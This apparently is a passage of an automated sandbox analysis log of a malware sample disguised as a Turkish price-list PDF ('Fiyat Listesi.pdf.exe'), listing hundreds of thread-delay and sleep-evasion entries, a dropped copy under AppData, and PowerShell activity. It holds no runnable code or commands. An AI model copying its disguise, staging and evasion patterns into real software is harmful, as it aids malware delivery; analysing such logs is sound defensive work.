                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396172
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396047
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395937
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395828
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395718
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395424
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395297
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395187
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395078
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394968
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394859
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394750
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394640
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394531
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394421
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394312
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394203
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394093
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399781
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399367
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399262
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399046
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398718
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398499
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398390
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398171
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398062
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397953
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397843
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397732
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397511
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397265
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397046
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396834
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396593
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396265
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396046
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395827
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395718
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395499
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395390
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395171
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395062
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394953
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394843
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394733
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394515
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394406
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394296
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394187
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394077
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399766
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399657
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399532
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399422
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399313
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399188
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399063
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398938
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398813
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398469
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398360
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398235
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398110
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397989
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397860
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397744
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397516
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397063
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396947
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396280
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396063
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395953
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395844
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395610
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395485
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395360
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395235
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395110
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394985
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394860
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394610
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394266
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5645Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4079Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWindow / User API: threadDelayed 2585Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWindow / User API: threadDelayed 7262Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 3301Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 6552Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 8056
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 1781
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep count: 37 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7996Thread sleep count: 2585 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399883s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7996Thread sleep count: 7262 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399638s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2399094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398663s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398161s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2398031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2397046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2396047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395424s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2395078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep count: 40 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7404Thread sleep count: 3301 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7404Thread sleep count: 6552 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399367s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399262s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399046s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398499s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398171s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398062s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397843s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397732s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397625s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397511s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397046s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396834s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396593s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396484s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396046s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395827s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395499s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395171s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395062s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394843s >= -30000sJump to behavior
